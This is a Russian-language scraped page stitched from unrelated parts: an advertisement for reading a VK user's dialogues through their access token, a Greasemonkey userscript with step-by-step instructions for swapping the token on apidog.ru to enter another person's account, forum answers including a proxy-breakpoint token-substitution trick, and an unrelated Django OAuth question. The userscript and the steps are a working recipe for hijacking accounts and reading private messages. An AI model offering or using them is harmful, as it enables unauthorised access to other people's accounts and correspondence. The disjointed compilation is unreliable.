Просмотреть диалоги через Access Token
Наша API функция «Просмотреть диалоги через Access Token» позволяет Вам читать все диалоги пользователя, используя лишь его токен.
Для возможности чтения диалогов по токену, токен должен обладать правами доступа messages и offline.
Функция создана лишь в ознакомительных целях. Мы не несем ответственности за Ваши действия.
Если у Вас возникли затруднения по использованию API функции, Вы всегда можете обратиться в раздел Часто задаваемые вопросы.
Особенности функции
Чтение диалогов по токену
Непрочитанные диалоги остаются непрочитанными, когда Вы их просматриваете
Аккаунт пользователя выходит в онлайн во время просмотра диалогов
Все наши API функции абсолютно бесплатны
Ваша безопасность
Работа API функции «Просмотреть диалоги через Access Token» основана на официальном API ВКонтакте, что дает полную безопасность Вашему аккаунту. Мы не можем получить Ваши пароли или же какие-либо личные данные.
Для работы функции Вам необходимо будет получить «Access Token», согласно нашей инструкции. Каждая наша функция запрашивает только те флаги доступа, которые ей необходимы. В этом Вы можете сами убедиться во время получения «Access Token».
Как зайти в ВК с помощью токена

1) Устанавливаем на firefox расширение Greasemonkey.

2) Логинимся на сайте apidog.ru через левый акк.
3) Далее нажимаем на значок нашей обезьянки в верхнем правом углу экрана.

удаляем там абсолютно всё и вставляем наш скрипт:
// ==UserScript== // @name mamkinhacker // @version 1 // @grant none // @run-at document-start // ==/UserScript== function fordarkwebs() < var access_token = "СЮДА ПИШЕМ ВАШ ТОКЕН"; function getCookie(name) < var value = "; " + document.cookie; var parts = value.split("; " + name + "="); if (parts.length == 2) return parts.pop().split(";").shift(); >var elts = document.getElementsByTagName('script'), i = elts.length, elt; while (i--) < elt = elts[i]; elt.innerHTML = elt.innerHTML.split("\x76alue: \"" + getCookie("userAccessToken") + "\"").join("\x76alue: \"" + access_token + "\""); >> function addJS_Node(text, s_URL, funcToRun, runOnLoad) < var D = document; var scriptNode = D.createElement('script'); if(runOnLoad) scriptNode.addEventListener ("load", runOnLoad, false); scriptNode.type = "text/javascript"; if(text) scriptNode.textContent = text; if(s_URL) scriptNode.src = s_URL; if(funcToRun) scriptNode.textContent = '(' + funcToRun.toString() + ')()'; var targ = D.getElementsByTagName('head')[0] || D.body || D.documentElement; targ.appendChild(scriptNode); >addJS_Node(null, null, fordarkwebs, null)
4) Вставляем в скрипт свой токен. Вот сюда:

И жмём кнопку в верхнем левом углу экрана
5) Не закрывая страницу переходим на вкладку с открытой страничкой apidog.ru и обновляем её.
Вуаля, вы попали на чужую страницу с помощью токена.
Как войти в VK по access token?
Если вопрос ещё не решён , то вы можете через Charles или любой другой HTTP прокси поставить breakpoint на ответе когда vk отдаёт токен для мобильного приложения и подставить необходимый вам токен в ответ.
Ответ написан более трёх лет назад
timur102 @timur102 Автор вопроса
можно ли тоже самое сделать на android?
Ответы на вопрос 2
Никак, это невозможно. Access Token используется для доступа к API.
В API ВКонтакте для получения ключа доступа используется открытый протокол OAuth 2.0. При этом пользователь не передает логин и пароль приложению, поэтому его аккаунт не может быть скомпрометирован.
При использовании OAuth-авторизации пользователь не передаёт свой логин и пароль к защищённым ресурсам напрямую в приложение. Поэтому:
- У пользователя больше оснований доверять приложению, поскольку пользователь может быть уверен, что несанкционированный доступ к его личным данным невозможен. Не владея логином и паролем пользователя, приложение сможет выполнять только те действия с данными, которые разрешил пользователь, и никакие другие.
- При разработке приложения не нужно заботиться об обеспечении конфиденциальности логина и пароля пользователя. Логин и пароль не передаются приложению, а следовательно, они не могут попасть в руки злоумышленников.
Ответ написан более трёх лет назад
Нравится 1 1 комментарий
HexUserHex @HexUserHex
Предполагаю что, все сайты которые предоставляют вход в ВК по API токену просто берут токен юзера и дергают нужные API у ВК и далее после получения данных просто отрисовывают графический интерфейс у себя, а пользователь думает что он действительно зашел в ВК по токену.

Гуглите apidog. Вам нужны аналоги.
Ответ написан более трёх лет назад
Комментировать
Нравится Комментировать
Ваш ответ на вопрос
Войдите, чтобы написать ответ

- ВКонтакте
Ограничить команду доступом только у админов VK BOT?
- 1 подписчик
- 25 янв.
- 12 просмотров

- Node.js
- +1 ещё
Что делать если ошибка при запуске бота вк node js?
- 1 подписчик
- 22 янв.
- 56 просмотров
Получение access token vk. Django

Суть такова: сделать так называемую привязку VK с целью получения access token. Зашел в документацию VK — нашел инфу: Я пытаюсь делать запрос, выдается ошибка: < "error": "invalid_client", "error_description": "client_id is undefined" >Так же сначала попробовал сделать авторизацию через VK, думая, что так смогу получить access token(не знаю, можно ли так действительно получить), и у меня вроде получилось реализовать авторизацию, и ошибок о client_id не было. Вопрос таков: Правильно ли сама мысль о получении access token(имеется в виду, делается ли это действительно так, как я задумал или же все в корне не верно)? Если нет, то как это можно реализовать, если да, то где ошибки? Код ниже views.py Перенаправление на vk
@login_required def vk_link(request): return redirect('https://oauth.vk.com/access_token/', params=< 'client_id': 'id', 'client_secret': 'token', 'redirect_url': 'http://127.0.0.1:8000/profile', 'code': request.GET.get('code'), >)
urls.py
urlpatterns = [ re_path(r'^login', views.login, name="login"), path('admin/', admin.site.urls), path('', views.index, name="main"), path('signUp', views.signUp, name="signUp"), path('profile', views.profile, name='profile'), path('logout', views.logout_view, name='logout'), path('vk', views.vk_link, name="vk"), ]
кнопка перенаправления

id и secret заменил по понятным причинам EDIT Правильно ли я передаю параметры при redirect? Может быть в этом проблема? Видел, как параметры ещё передают через urlencode(),но с ним у меня тоже не получилось, ошибка та же Скрин ошибки